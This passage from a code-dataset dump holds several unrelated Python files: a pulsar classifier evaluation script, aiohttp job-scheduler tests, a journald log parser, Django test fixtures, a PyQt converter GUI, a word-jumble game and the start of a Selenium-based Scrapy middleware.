{input.shape}')","sub_path":"tutorials/W1D3_MultiLayerPerceptrons/solutions/W1D3_Tutorial1_Solution_600147c3.py","file_name":"W1D3_Tutorial1_Solution_600147c3.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"138278458","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 8 20:41:02 2019\r\n\r\n@author: German\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 17 10:50:19 2019\r\n\r\n@author: German\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport sklearn as skl\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom sklearn.svm import SVC\r\nimport pickle\r\nimport torch\r\nfrom torch import nn\r\nfrom sklearn.metrics import confusion_matrix\r\nimport plot_confusion_matrix as pcm\r\n\r\npulsdata = pd.read_csv('./HTRU_2.csv',header=None)\r\n\r\npulsdata.columns = ['Mean of the integrated profile',\r\n 'Standard deviation of the integrated profile',\r\n 'Excess kurtosis of the integrated profile',\r\n 'Skewness of the integrated profile',\r\n 'Mean of the DM-SNR curve',\r\n 'Standard deviation of the DM-SNR curve',\r\n 'Excess kurtosis of the DM-SNR curve',\r\n 'Skewness of the DM-SNR curve','Target']\r\n\r\nprint(pulsdata.head(10))\r\n\r\n\r\npulsdata['Target'].value_counts()\r\n\r\nsns.countplot(x='Target',data=pulsdata)\r\nplt.show()\r\n#Normalize data\r\ncolumns2scale = ['Mean of the integrated profile',\r\n 'Standard deviation of the integrated profile',\r\n 'Excess kurtosis of the integrated profile',\r\n 'Skewness of the integrated profile',\r\n 'Mean of the DM-SNR curve',\r\n 'Standard deviation of the DM-SNR curve',\r\n 'Excess kurtosis of the DM-SNR curve',\r\n 'Skewness of the DM-SNR curve']\r\npulsdata[columns2scale]=pulsdata[columns2scale].apply(lambda x: (x-x.min())/(x.max()-x.min()))\r\n\r\n#Dividir en Train y Test datasets\r\nN=len(pulsdata)\r\nN_train=np.round(0.8*N).astype(np.int32)\r\n\r\nrandomdata=np.random.permutation(len(pulsdata))\r\n\r\ndftrain=pulsdata.iloc[list(randomdata[0:N_train])]\r\nYtrain = dftrain['Target']\r\nXtrain = dftrain.drop('Target',axis=1)\r\n\r\ndftest=pulsdata.iloc[list(randomdata[N_train:-1])]\r\nYtest = dftest['Target']\r\nXtest = dftest.drop('Target',axis=1)\r\n\r\n\r\n#format for neural network\r\nnnXtrain = torch.from_numpy(np.array(Xtrain)).float()\r\n\r\nnnXtest = torch.from_numpy(np.array(Xtest)).float()\r\n \r\nnnYtrain = torch.from_numpy(np.array(Ytrain)).float()\r\nnnYtrain=nnYtrain.unsqueeze(1)\r\nnnYtest 
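# --- Editorial aside (hedged, not in the original script) ---------------------
# The min-max normalisation above is applied to the whole DataFrame before the
# train/test split, which leaks test-set statistics into training. A
# leakage-free variant fits the scaler on the training split only:
from sklearn.preprocessing import MinMaxScaler

scaler = MinMaxScaler().fit(Xtrain)      # statistics from the training data only
Xtrain_scaled = scaler.transform(Xtrain)
Xtest_scaled = scaler.transform(Xtest)   # reuse the fitted parameters unchanged
# ------------------------------------------------------------------------------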
= torch.from_numpy(np.array(Ytest)).float()\r\nnnYtest=nnYtest.unsqueeze(1)\r\n\r\n#load neural network model\r\n\r\nneuralnetwork = nn.Sequential(nn.Linear(8,56),\r\n nn.Dropout(0.2),\r\n nn.Linear(56,24),\r\n nn.Linear(24,1),\r\n nn.Sigmoid())\r\n \r\n\r\nnncriterion = nn.BCELoss()\r\n\r\nstate_dict = torch.load('pulsarneuralnetwork.sav')\r\nneuralnetwork.load_state_dict(state_dict)\r\nneuralnetwork.eval()\r\n\r\n#neural network predictions\r\nnn_predictions = neuralnetwork(nnXtest).float()\r\nnn_loss = nncriterion(nn_predictions, nnYtest)\r\nprint(nn_predictions)\r\nprint('The test loss is:',nn_loss)\r\n\r\n#change predictions vector from torch to numpy\r\nnn_predictions = nn_predictions.detach().numpy()\r\n#round probabilities to 0 or 1\r\nnn_roundpredictions = np.round_(nn_predictions,decimals=0)\r\n\r\n#load logistic and SVC model\r\n\r\nSVCmodel = pickle.load(open(\"pulsarSVM.sav\", 'rb'))\r\nlogisticmodel = pickle.load(open(\"pulsarlogreg.sav\", 'rb'))\r\n\r\nSVC_predictions = SVCmodel.predict(Xtest)\r\nlogi_predictions = logisticmodel.predict(Xtest)\r\n\r\n#probabilities (instead of predictions) for precision/recall\r\nSVC_prob = SVCmodel.predict_proba(Xtest)\r\nSVC_prob = SVC_prob[:,1]\r\nlogi_prob = logisticmodel.predict_proba(Xtest)\r\nlogi_prob = logi_prob[:,1]\r\n\r\n\r\n#compare by using confusion matrix for test data\r\nprint('_____________________________________________________________')\r\n\r\nprint('Accuracy on Test set:')\r\nclass_names=['Negativo','Positivo']\r\nplt.rcParams[\"axes.grid\"] = False\r\n\r\n#nn_cfmatrix = confusion_matrix(Ytest, nn_predictions)\r\n#print('Neural network confusion matrix is:',nn_cfmatrix)\r\n\r\n#we'll now check training set accuracy for comparing\r\nnn_trainpredictions = neuralnetwork(nnXtrain).float()\r\n\r\nnn_trainpredictions = nn_trainpredictions.detach().numpy()\r\n#round probabilities to 0 or 1\r\nnn_trainpredictions = np.round_(nn_trainpredictions,decimals=0)\r\n\r\n#calculate training set predictions\r\n\r\nSVC_trainpredictions = SVCmodel.predict(Xtrain)\r\nlogi_trainpredictions = logisticmodel.predict(Xtrain)\r\n\r\nprint('Accuracy on Train set:')\r\n\r\nnn_traincfmatrix = confusion_matrix(Ytrain, nn_trainpredictions)\r\nprint('Neural network confusion matrix is:',nn_traincfmatrix)\r\n\r\n#sns.heatmap(nn_traincfmatrix, annot=True,xticklabels=['Negative','Positive'],\r\n #yticklabels=['Negative','Positive'],\r\n #xlabel='Valor Predicho',ylabel='Valor Real')\r\n\r\nSVC_traincfmatrix = confusion_matrix(Ytrain, SVC_trainpredictions)\r\nprint('SVC confusion matrix is:',SVC_traincfmatrix)\r\n\r\nlogi_traincfmatrix = confusion_matrix(Ytrain, logi_trainpredictions)\r\nprint('Logistic Regression (with RFE) confusion matrix is:',logi_traincfmatrix)\r\n\r\nprint('_____________________________________________________________')\r\n\r\n\r\n#average precision\r\nfrom sklearn.metrics import average_precision_score\r\nnn_avprecision = average_precision_score(Ytest, nn_predictions)\r\nSVC_avprecision = average_precision_score(Ytest, SVC_prob)\r\nlogi_avprecision = average_precision_score(Ytest, logi_predictions)\r\n\r\n\r\nprint('_____________________________________________________________')\r\n\r\nprint('Average Precision Scores on Test set:')\r\n\r\nprint('Neural Network: {0:0.2f}'.format(nn_avprecision))\r\nprint('SVC: {0:0.2f}'.format(SVC_avprecision))\r\nprint('Logistic Regression (with RFE): {0:0.2f}'.format(logi_avprecision))\r\n\r\nprint('_____________________________________________________________')\r\n\r\n#precision-recall 
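# --- Editorial note (hedged) --------------------------------------------------
# average_precision_score is a ranking metric, so it is normally fed predicted
# probabilities rather than hard 0/1 labels. The neural-network and SVC lines
# above pass scores (nn_predictions, SVC_prob); the logistic-regression line
# passes class labels and was probably meant to be:
# logi_avprecision = average_precision_score(Ytest, logi_prob)
# ------------------------------------------------------------------------------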
curve\r\nfrom sklearn.metrics import precision_recall_curve\r\nfrom sklearn.utils.fixes import signature\r\n\r\n#clear figure\r\nplt.clf()\r\n\r\n\r\nnn_precision, nn_recall, _ = precision_recall_curve(Ytest, nn_predictions)\r\nSVC_precision, SVC_recall, _ = precision_recall_curve(Ytest, SVC_prob)\r\nlogi_precision, logi_recall, _ = precision_recall_curve(Ytest, logi_prob)\r\n\r\nplt.figure(0)\r\nstep_kwargs = ({'step': 'post'}\r\n if 'step' in signature(plt.fill_between).parameters\r\n else {})\r\nplt.step(nn_recall, nn_precision, color='b', alpha=0.2,\r\n where='post')\r\nplt.fill_between(nn_recall, nn_precision, alpha=0.2, color='b', **step_kwargs)\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\nplt.ylim([0.0, 1.05])\r\nplt.xlim([0.0, 1.0])\r\nplt.title('Neural Network Model Precision-Recall curve: AP={0:0.2f}'.format(\r\n nn_avprecision))\r\nplt.savefig('neuralnet_precall.png')\r\nplt.show()\r\n\r\n#precision recall for SVC model\r\nplt.figure(1)\r\nstep_kwargs = ({'step': 'post'}\r\n if 'step' in signature(plt.fill_between).parameters\r\n else {})\r\nplt.step(SVC_recall, SVC_precision, color='b', alpha=0.2,\r\n where='post')\r\nplt.fill_between(SVC_recall, SVC_precision, alpha=0.2, color='b', **step_kwargs)\r\n\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\nplt.ylim([0.0, 1.05])\r\nplt.xlim([0.0, 1.0])\r\nplt.title('SVC Model Precision-Recall curve: AP={0:0.2f}'.format(\r\n SVC_avprecision))\r\nplt.savefig('SVC_precall.png')\r\nplt.show()\r\n\r\n#precision recall for Logistic Regression model\r\nplt.figure(2)\r\nstep_kwargs = ({'step': 'post'}\r\n if 'step' in signature(plt.fill_between).parameters\r\n else {})\r\nplt.step(logi_recall, logi_precision, color='b', alpha=0.2,\r\n where='post')\r\nplt.fill_between(logi_recall, logi_precision, alpha=0.2, color='b', **step_kwargs)\r\n\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\nplt.ylim([0.0, 1.05])\r\nplt.xlim([0.0, 1.0])\r\nplt.title('Logistic Regression Model Precision-Recall curve: AP={0:0.2f}'.format(\r\n logi_avprecision))\r\nplt.savefig('logreg_precall.png')\r\nplt.show()","sub_path":"clasificacion pulsars/hacerprecisionrecall.py","file_name":"hacerprecisionrecall.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"399236089","text":"import asyncio\n\nimport pytest\nfrom aiohttp import web\n\nfrom aiojobs.aiohttp import atomic, get_scheduler, get_scheduler_from_app\nfrom aiojobs.aiohttp import setup as aiojobs_setup\nfrom aiojobs.aiohttp import spawn\n\n\nasync def test_plugin(test_client):\n job = None\n\n async def coro():\n await asyncio.sleep(10)\n\n async def handler(request):\n nonlocal job\n\n job = await spawn(request, coro())\n assert not job.closed\n return web.Response()\n\n app = web.Application()\n app.router.add_get('/', handler)\n aiojobs_setup(app)\n\n client = await test_client(app)\n resp = await client.get('/')\n assert resp.status == 200\n\n assert job.active\n await client.close()\n assert job.closed\n\n\nasync def test_no_setup(test_client):\n async def handler(request):\n with pytest.raises(RuntimeError):\n get_scheduler(request)\n return web.Response()\n\n app = web.Application()\n app.router.add_get('/', handler)\n\n client = await test_client(app)\n resp = await client.get('/')\n assert resp.status == 200\n\n\nasync def test_atomic(test_client):\n @atomic\n async def handler(request):\n await asyncio.sleep(0)\n return web.Response()\n\n app = web.Application()\n app.router.add_get('/', 
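# --- Editorial note (version-dependent, hedged) -------------------------------
# sklearn.utils.fixes.signature was a Python 2/3 compatibility shim and has been
# removed from recent scikit-learn releases. The standard library is a drop-in
# replacement for the step_kwargs probing pattern used in this script:
# from inspect import signature
# ------------------------------------------------------------------------------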
handler)\n aiojobs_setup(app)\n\n client = await test_client(app)\n resp = await client.get('/')\n assert resp.status == 200\n\n scheduler = get_scheduler_from_app(app)\n\n assert scheduler.active_count == 0\n assert scheduler.pending_count == 0\n\n\nasync def test_atomic_from_view(test_client):\n app = web.Application()\n\n class MyView(web.View):\n @atomic\n async def get(self):\n return web.Response()\n\n app.router.add_route(\"*\", \"/\", MyView)\n aiojobs_setup(app)\n\n client = await test_client(app)\n resp = await client.get('/')\n assert resp.status == 200\n\n scheduler = get_scheduler_from_app(app)\n\n assert scheduler.active_count == 0\n assert scheduler.pending_count == 0\n","sub_path":"tests/test_aiohttp.py","file_name":"test_aiohttp.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"346999520","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis serves to extract data from a binary file and print it to the screen.\nThe binary file is expected to be a journald-log.\n\"\"\"\n\nimport struct\nimport sys\nimport argparse\nimport hexdisplay\n\ndef main():\n\n args = parse_args()\n\n data_string = file_to_string(args.infile)\n try:\n file_header = parse_file_header(data_string)\n except NoJournaldFile:\n print('No journald file')\n sys.exit(1)\n\n parse_data(data_string, offset=file_header['header_size'])\n\n sys.exit(0)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description = 'Read journald-logfiles')\n parser.add_argument('infile', help = 'path to logfile')\n return parser.parse_args()\n\ndef file_to_string(filename):\n with open(filename, 'rb') as f:\n data_string = f.read()\n return data_string\n\ndef parse_file_header(data_string):\n file_header_string = ('<'\n + '8s' # signature\n + 'L' # compatibility flags\n + 'L' # incompatibility flags\n + 'B' # file state\n + '7s' # reserved bits\n + '2Q' # file id\n + '2Q' # machine id\n + '2Q' # boot id\n + '2Q' # seqnum id\n + 'Q' # header size\n + 'Q' # arena size\n + 'Q' # data hash table offset\n + 'Q' # data hash table size\n + 'Q' # field hash table offset\n + 'Q' # field hash table size\n + 'Q' # tail object offset\n + 'Q' # n objects\n + 'Q' # n entries\n + 'Q' # tail entry seqnum\n + 'Q' # head entry seqnum\n + 'Q' # entry array offset\n + 'Q' # head entry realtime\n + 'Q' # tail entry realtime\n + 'Q' # tail entry monotonic\n + 'Q' # n data\n + 'Q' # n fields\n + 'Q' # n tags\n + 'Q' # n entry arrays\n )\n\n journald_file_header = struct.unpack_from(file_header_string, data_string,0)\n\n file_header = dict([\n ('magic',journald_file_header[0]),\n ('comp_flags', journald_file_header[1]),\n ('incomp_flags', journald_file_header[2]),\n ('file_state', journald_file_header[3]),\n ('reserved_bits', journald_file_header[4]),\n ('file_id', (journald_file_header[5] << 64 | journald_file_header[6])),\n ('machine_id', (journald_file_header[7] << 64 | journald_file_header[8])),\n ('boot_id', (journald_file_header[9] << 64 | journald_file_header[10])),\n ('seqnum_id', (journald_file_header[11] << 64 | journald_file_header[12])),\n ('header_size', journald_file_header[13]),\n ('arena_size', journald_file_header[14]),\n ('data_hash_table_offset', journald_file_header[15]),\n ('data_hash_table_size', journald_file_header[16]),\n ('field_hash_table_offset', journald_file_header[17]),\n ('field_hash_table_size', journald_file_header[18]),\n ('tail_object_offset', journald_file_header[19]),\n ('n_objects', journald_file_header[20]),\n 
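# --- Illustrative sketch (toy layout, hedged; not journald's real header) -----
# struct format strings encode the binary layout: '<' selects little-endian,
# 'Q' an unsigned 64-bit integer, '8s' 8 raw bytes. unpack_from reads at an
# arbitrary offset without slicing the buffer.
import struct

buf = b'LPKSHHRH' + struct.pack('<QQ', 240, 4096)
magic, header_size, arena_size = struct.unpack_from('<8sQQ', buf, 0)
assert (magic, header_size, arena_size) == (b'LPKSHHRH', 240, 4096)

def align8(offset):
    # the 64-bit alignment idiom used later in this file:
    # (offset | 7) + 1 rounds a non-multiple of 8 up to the next multiple of 8
    return offset if offset % 8 == 0 else (offset | 7) + 1

assert [align8(o) for o in (41, 47, 48)] == [48, 48, 48]
# ------------------------------------------------------------------------------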
('n_entries', journald_file_header[21]),\n ('tail_entry_seqnum', journald_file_header[22]),\n ('head_entry_seqnum', journald_file_header[23]),\n ('entry_array_offset', journald_file_header[24]),\n ('head_entry_realtime', journald_file_header[25]),\n ('tail_entry_realtime', journald_file_header[26]),\n ('tail_entry_monotonic', journald_file_header[27]),\n ('n_data', journald_file_header[28]),\n ('n_fields', journald_file_header[29]),\n ('n_tags', journald_file_header[30]),\n ('n_entry_arrays', journald_file_header[31])])\n\n if file_header['magic'] != b'LPKSHHRH':\n raise NoJournaldFile('This file is not a journald file')\n return file_header\n\ndef parse_data(data_string, offset):\n object_header_parse_string = ('<'\n + 'B' # Type\n + 'B' # Flags\n + '6x' # reserved\n + 'Q' # Size\n )\n\n def unused(data_string, offset):\n return None\n\n def data_hash_table(data_string, offset):\n return None\n\n def field_hash_table(data_string, offset):\n return None\n\n def entry_array(data_string, offset):\n return None\n\n def tag(data_string, offset):\n return None\n\n def field(data_string, offset):\n return None\n\n def data(data_string, offset):\n return None\n\n def entry(data_string, offset):\n entry_offset = offset + object_header_size\n entry_parse_string = ('<'\\\n + 'Q' # seqnum;\n + 'Q' # realtime;\n + 'Q' # monotonic;\n + '2Q' # boot_id;\n + 'Q' # xor_hash;\n )\n log_entry = struct.unpack_from(entry_parse_string, data_string, entry_offset)\n\n entry = {}\n entry['seqnum'] = log_entry[0]\n entry['ts_realtime'] = log_entry[1]\n entry['ts_monotonic'] = log_entry[2]\n entry['boot_id'] = (log_entry[3] << 64 | log_entry[4])\n\n entry_payload_parse_string = ('<'\n + 'Q' # entry_item_offset\n + 'Q' # entry_item_hash\n )\n\n entry_payload_size = struct.calcsize(entry_payload_parse_string)\n\n item_offset = entry_offset + struct.calcsize(entry_parse_string)\n\n payload = {}\n while item_offset < (offset + object_header[2]):\n data_object_offset, data_object_hash = struct.unpack_from(entry_payload_parse_string, data_string, item_offset)\n data_object = dataobject(data_string, data_object_offset)\n if data_object is not None:\n split_objects = data_object.decode(encoding='utf-8').split('=')\n payload[split_objects[0]] = split_objects[1]\n\n item_offset += entry_payload_size\n\n entry['payload'] = payload\n\n return entry\n\n def dataobject(data_string, offset):\n data_header = struct.unpack_from(object_header_parse_string, data_string, offset)\n if data_header[0] != 1:\n return None\n\n length = data_header[2] - object_header_size - 48 # 48 := bytes used for hashes below\n\n data_object_parse_string = ('<'\\\n + 'Q' # hash\n + 'Q' # next hash offset\n + 'Q' # next field offset\n + 'Q' # next entry offset\n + 'Q' # entry array offset\n + 'Q' # n entries\n + str(length) # length of payload\n + 's' # payload\n )\n\n data_object = struct.unpack_from(data_object_parse_string, data_string, offset + object_header_size)\n\n payload = data_object[6]\n return payload\n\n # create function-dictionary to emulate switch-case\n functiondict = {\n 0: unused,\n 1: data,\n 2: field,\n 3: entry,\n 4: data_hash_table,\n 5: field_hash_table,\n 6: entry_array,\n 7: tag}\n\n object_header_size = struct.calcsize(object_header_parse_string)\n\n # list of log entries\n entry_list = []\n\n # loop through data_string to find all log entries\n while offset < len(data_string):\n # ensure correct 64-bit-alignment\n if offset % 8 != 0:\n offset = (offset | 7) + 1\n\n object_header = struct.unpack_from(object_header_parse_string, 
data_string, offset)\n\n        try:\n            object_type = object_header[0]\n            if object_header[2] == 0:\n                raise KeyError('Invalid size')\n        except KeyError:\n            print(object_header)\n            break\n\n        try:\n            # add only entry objects, ignore everything else\n            new_entry = functiondict[object_type](data_string, offset + object_header_size)\n        except KeyError:\n            raise\n\n        if new_entry is not None:\n            entry_list.append(new_entry)\n        offset += object_header[2]\n\n    clean_entry_list = []\n    for entry in entry_list:\n        if entry not in clean_entry_list:\n            clean_entry_list.append(entry)\n\n    for l in clean_entry_list:\n        print('{l}'.format(l=l))\n\n\n# define errors\nclass NoJournaldFile(Exception):\n    pass\n\nclass UnusedObjectError(Exception):\n    pass\n\nif __name__ == '__main__':\n    main()\n","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":8282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"13551664","text":"from datetime import timedelta\nfrom django.utils import timezone\nfrom oauth2_provider.models import AccessToken, Application\nfrom rest_framework.test import APIClient\nfrom quiz.models import Quiz, Category, Question\nfrom user.models import User, Point\nimport pytest\n\n\n@pytest.fixture\ndef admin_client(admin_user, application_client):\n    access_token = AccessToken.objects.create(\n        user=admin_user,\n        scope=\"read write\",\n        expires=timezone.now() + timedelta(seconds=300),\n        token=\"secret-access-token-key\",\n        application=application_client\n    )\n\n    client = APIClient()\n    client.credentials(HTTP_AUTHORIZATION='Bearer ' + access_token.token)\n    client.force_authenticate(user=admin_user)\n\n    return client\n\n\n@pytest.fixture\ndef application_client(admin_user):\n    return Application.objects.create(\n        name=\"Test Application\",\n        redirect_uris=\"http://localhost http://example.com http://example.org\",\n        user=admin_user,\n        client_type=Application.CLIENT_CONFIDENTIAL,\n        authorization_grant_type=Application.GRANT_AUTHORIZATION_CODE,\n    )\n\n\n@pytest.fixture\ndef question():\n    question = Question()\n    question.question = \"test_question\"\n    question.answer_A = \"A\"\n    question.answer_B = \"B\"\n    question.answer_C = \"C\"\n    question.save()\n    return question\n\n\n@pytest.fixture\ndef category():\n    category = Category()\n    category.name = \"test_category\"\n    category.save()\n    return category\n\n\n@pytest.fixture\ndef point():\n    point = Point()\n    point.category = 1\n    point.points = 20\n    point.global_point = 40\n    point.save()\n    return point\n\n\n@pytest.fixture\ndef user():\n    point = Point()\n    point.category = 1\n    point.points = 20\n    point.global_point = 40\n    point.save()\n\n    user = User()\n    user.email = \"user@example.com\"\n    user.password = \"test_pass\"\n    user.save()\n    user.points.add(point)\n    return user\n\n\n@pytest.fixture\ndef quiz():\n    category = Category()\n    category.name = \"test_category\"\n    category.save()\n\n    question = Question()\n    question.question = \"test_question\"\n    question.answer_A = \"test_A\"\n    question.answer_B = \"test_B\"\n    question.answer_C = \"test_C\"\n    question.save()\n\n    quiz = Quiz()\n    quiz.title = \"test_quiz\"\n    quiz.category = category\n    quiz.save()\n    quiz.question.add(question)\n    return quiz","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"26812237","text":"__author__ = 'tylerzhu'\n\nfrom PyQt5.QtGui import (QIcon)\nfrom PyQt5.QtWidgets import 
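# --- Minimal usage sketch (hypothetical test module, not part of this repo;
# assumes pytest-django for database access) ----------------------------------
# pytest wires the fixtures above in by parameter name, so a test only has to
# declare what it needs; the quiz fixture transitively builds its own
# Category and Question rows.
import pytest

@pytest.mark.django_db
def test_quiz_fixture_wiring(quiz):
    assert quiz.title == 'test_quiz'
    assert quiz.question.count() == 1
# ------------------------------------------------------------------------------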
(QApplication,\n QMainWindow,\n QHBoxLayout,\n QVBoxLayout,\n QWidget,\n QPushButton,\n QGroupBox)\n\nfrom ui.convertlistUi import ConvertList\nfrom ui.configUi import ConfigUI\nfrom ui.convertResultUi import ResultUI\nimport logging\nimport time\nimport datetime\nimport os\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n # set window's title, icon, size info\n self.setWindowTitle(\"配置转换工具\")\n self.setWindowIcon(QIcon(\"res/main.ico\"))\n self.setMinimumSize(160, 160)\n self.resize(1080, 680)\n\n widget = QWidget()\n self.setCentralWidget(widget)\n\n self.hbox = QHBoxLayout()\n self.hbox.setContentsMargins(5, 5, 5, 5)\n widget.setLayout(self.hbox)\n\n # 左边布局\n # 转换列表\n convGroupBox = QGroupBox(\"转换列表\")\n convGroupBoxLayout = QHBoxLayout()\n convGroupBox.setLayout(convGroupBoxLayout)\n self.convertlist = ConvertList()\n convGroupBoxLayout.addWidget(self.convertlist)\n self.hbox.addWidget(convGroupBox)\n\n # 右边布局\n rwidget = QWidget()\n rwidgetLayout = QVBoxLayout()\n rwidget.setLayout(rwidgetLayout)\n self.hbox.addWidget(rwidget)\n # 1.配置\n confGroupBox = QGroupBox(\"配置\")\n confGroupBoxLayout = QHBoxLayout()\n confGroupBox.setLayout(confGroupBoxLayout)\n self.configUI = ConfigUI()\n confGroupBoxLayout.addWidget(self.configUI)\n rwidgetLayout.addWidget(confGroupBox)\n\n # 2.转换结果\n convResultGroupBox = QGroupBox(\"转换结果\")\n convResultGroupBoxLayout = QVBoxLayout()\n convResultGroupBox.setLayout(convResultGroupBoxLayout)\n self.resultUI = ResultUI()\n convResultGroupBoxLayout.addWidget(self.resultUI)\n rwidgetLayout.addWidget(convResultGroupBox)\n\n # 3. 转换按钮\n pbwidget = QWidget()\n vbox = QHBoxLayout()\n pbwidget.setLayout(vbox)\n clearPB = QPushButton(\"清空提示框\")\n convPB = QPushButton(\"开始转换\")\n # submit.clicked.connect(self.onSubmit)\n vbox.addStretch()\n vbox.addWidget(clearPB)\n vbox.addWidget(convPB)\n rwidgetLayout.addWidget(pbwidget)\n\n # 信号处理\n self.configUI.parseConfigSignal.connect(self.convertlist.parse_conv_list)\n self.configUI.selectResGroupSignal.connect(self.convertlist.select_res_group)\n convPB.clicked.connect(self.convertlist.convert)\n\n\n\ndef init_logger():\n # 创建一个logger\n logger = logging.getLogger('convert_logger')\n logger.setLevel(logging.DEBUG)\n # 创建一个handler,用于写入日志文件\n if not os.path.exists(\"log/\"):\n os.makedirs(\"log\")\n fh = logging.FileHandler('log/convert'\n + datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S') + '.log')\n fh.setLevel(logging.DEBUG)\n # 再创建一个handler,用于输出到控制台\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n # 定义handler的输出格式\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # 给logger添加handler\n logger.addHandler(fh)\n logger.addHandler(ch)\n\nif __name__ == '__main__':\n\n\n\n import sys\n init_logger()\n\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n # window.showFullScreen()\n sys.exit(app.exec_())","sub_path":"convert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"559799075","text":"# Jumble up a given string\nimport random\nimport json\n\nprint('''\n WELCOME TO THIS GAME\n TAKE A GUESS OF THE BELOW WORD BASED ON THE HINT IN FRONT OF IT \n ''')\n\nscore = 0\ndef jumble(string, hint) :\n global score\n firstLetter = string[0]\n lastLetter = string[-1]\n stringList = [char for char in string] \n 
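# --- Editorial sketch (hedged alternative, not in the original) ---------------
# The pop-based shuffle implemented below draws the middle characters one at a
# time; random.sample expresses the same "shuffled copy" in a single call
# (words of length >= 2 assumed):
import random

def jumble_word(word):
    # keep the first and last letters fixed, shuffle everything in between
    middle = random.sample(word[1:-1], len(word) - 2)
    return word[0] + ''.join(middle) + word[-1]
# ------------------------------------------------------------------------------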
stringList.pop(0)\n stringList.pop(-1)\n\n randomizedStringList = []\n for i in range(0, len(stringList)) :\n randomChar = random.choice(stringList)\n randomizedStringList.append(randomChar)\n stringList.pop(stringList.index(randomChar))\n\n\n randomizedString = ''\n for char in randomizedStringList :\n randomizedString += char\n firstLetter += randomizedString\n firstLetter += lastLetter\n \n print(firstLetter + ' ---- ' + hint)\n userGuess = input('> ')\n if userGuess == string :\n print('+1')\n score += 1\n elif userGuess.lower() == string.lower() :\n print('small letter - do not do it again')\n \n else:\n print(f'GAME OVER -- YOU SCORE {score}')\n quit()\n \n# wordList = ['Hello', 'Brother', 'Example', 'Graduation', 'Nitrogen', 'Jumbling', 'Vocablury']\n# wordDict = {\n# 'Hello':'Hi', \n# 'Brother':'Sister', \n# 'Example':'Instance', \n# 'Graduation':'College', \n# 'Nitrogen': '71%', \n# 'Jumbling' : 'This game',\n# 'Vocablury' : 'Related to this game'\n# } \nwith open('StringJumbler\\words.json') as file:\n wordDict = json.load(file)\n wordDict = wordDict['words']\nrandomItems = [item for item in wordDict]\nitems = []\n\nfor item in wordDict :\n items.append(random.choice(randomItems)) # needs review\n \nfor item in items:\n jumble(item, wordDict[item])\nprint('YOU WON ALL!')","sub_path":"StringJumbler/StringJumbler.py","file_name":"StringJumbler.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"189026464","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nimport scrapy\nfrom scrapy import signals\nfrom scrapy.http import HtmlResponse\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom time import sleep\nimport re\nfrom os import environ\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('headless')\noptions.add_argument('window-size=1920x1080')\noptions.binary_location = '/usr/bin/google-chrome'\nbrowser = webdriver.Chrome(executable_path='/opt/google/chrome/chromedriver', chrome_options=options)\nloggedin = False\nwhere_i_am_now = ''\nsearched_same = False\n\ndef log_in_browser(domain):\n global browser\n global loggedin\n global where_i_am_now\n browser.get(domain)\n username_box = browser.find_element_by_id('j_username')\n username = environ['USERNAME']\n username_box.send_keys(username)\n username_box = browser.find_element_by_id('j_password')\n password = environ['PASSWORD']\n username_box.send_keys(password + Keys.RETURN)\n sleep(5)\n where_i_am_now = browser.current_url\n if where_i_am_now.endswith('freshLogin=true'):\n loggedin = True\n else:\n raise AssertionError\n return\n\n\nclass DataSpiderMiddleware(object):\n # Not all methods need to be defined. 
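# --- Editorial note (version-dependent, hedged) -------------------------------
# The executable_path and chrome_options keywords used above were removed in
# Selenium 4; the equivalent construction there is roughly:
# from selenium.webdriver.chrome.service import Service
# browser = webdriver.Chrome(service=Service('/opt/google/chrome/chromedriver'),
#                            options=options)
# ------------------------------------------------------------------------------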
